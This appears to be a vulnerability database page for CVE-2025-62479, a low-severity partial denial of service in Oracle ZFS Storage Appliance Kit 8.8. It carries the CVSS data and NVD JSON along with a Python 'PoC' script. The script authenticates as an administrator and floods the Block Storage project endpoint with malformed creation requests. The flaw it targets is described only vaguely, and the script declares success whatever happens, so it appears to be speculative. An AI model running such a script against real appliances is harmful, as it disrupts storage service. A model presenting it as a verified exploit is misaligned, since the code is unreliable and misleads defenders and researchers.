Security Vulnerability Report
中文
CVE-2025-62479 CVSS 2.7 LOW

CVE-2025-62479

Published: 2025-10-21 20:20:55
Last Modified: 2025-10-23 16:01:40
Source: [email protected]

Description

Vulnerability in the Oracle ZFS Storage Appliance Kit product of Oracle Systems (component: Block Storage). The supported version that is affected is 8.8. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle ZFS Storage Appliance Kit. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle ZFS Storage Appliance Kit. CVSS 3.1 Base Score 2.7 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:L).

CVSS Details

CVSS Score
2.7
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:oracle:zfs_storage_appliance_kit:8.8:*:*:*:*:*:*:* - VULNERABLE
Oracle ZFS Storage Appliance Kit 8.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-62479 - Oracle ZFS Storage Appliance Kit Block Storage DoS PoC # Vulnerability: Partial Denial of Service via HTTP # Requirements: High privileged account credentials # Target: Oracle ZFS Storage Appliance Kit version 8.8 # Component: Block Storage import requests import sys # Target configuration TARGET_HOST = "https://target-zfs-appliance:215" USERNAME = "admin" PASSWORD = "high_priv_password" # Step 1: Authenticate to the Oracle ZFS Storage Appliance Kit via HTTP API def authenticate(host, username, password): """ Authenticate to the Oracle ZFS Storage Appliance Kit REST API The appliance typically exposes a REST API on port 215 """ session = requests.Session() auth_url = f"{host}/api/access/v1.0/auth" payload = { "username": username, "password": password } headers = {"Content-Type": "application/json"} try: response = session.post(auth_url, json=payload, headers=headers, verify=False) if response.status_code == 201 or response.status_code == 200: print("[+] Authentication successful") return session else: print(f"[-] Authentication failed: {response.status_code}") return None except Exception as e: print(f"[-] Connection error: {e}") return None # Step 2: Exploit the Block Storage component to trigger partial DoS def exploit_block_storage(session, host): """ Send crafted requests to the Block Storage component to trigger partial denial of service condition """ # Endpoint for Block Storage operations block_storage_url = f"{host}/api/storage/v1.0/projects" headers = {"Content-Type": "application/json"} # Craft a request that triggers the vulnerability in Block Storage # The vulnerability is in how the Block Storage component handles # certain operations, leading to resource exhaustion or service disruption payload = { "name": "exploit_project", "sharesize": 0, "defaultvolblocksize": "", "logbias": "latency", "compression": "off", "dedup": "off", "encryption": "off", "quota": 0, "reservation": 0, "recordsize": "" } try: # Repeatedly send requests to trigger partial DoS for i in range(100): response = session.post(block_storage_url, json=payload, headers=headers, verify=False) print(f"[*] Request {i+1}: Status {response.status_code}") # Check if the service is degraded if response.status_code == 500 or response.status_code == 503: print(f"[!] Service disruption detected at request {i+1}") return True print("[+] Exploit completed - partial DoS may have been triggered") return True except Exception as e: print(f"[-] Exploit error (service may be disrupted): {e}") return True # Main execution if __name__ == "__main__": print(f"[*] Targeting: {TARGET_HOST}") print(f"[*] CVE-2025-62479 - Oracle ZFS Storage Appliance Kit DoS") session = authenticate(TARGET_HOST, USERNAME, PASSWORD) if session: exploit_block_storage(session, TARGET_HOST) else: print("[-] Failed to authenticate. High privileges required.") sys.exit(1)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62479", "sourceIdentifier": "[email protected]", "published": "2025-10-21T20:20:54.603", "lastModified": "2025-10-23T16:01:39.673", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the Oracle ZFS Storage Appliance Kit product of Oracle Systems (component: Block Storage). The supported version that is affected is 8.8. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle ZFS Storage Appliance Kit. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle ZFS Storage Appliance Kit. CVSS 3.1 Base Score 2.7 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:L)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:L", "baseScore": 2.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.2, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-267"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oracle:zfs_storage_appliance_kit:8.8:*:*:*:*:*:*:*", "matchCriteriaId": "D3E503FB-6279-4D4A-91D8-E237ECF9D2B0"}]}]}], "references": [{"url": "https://www.oracle.com/security-alerts/cpuoct2025.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.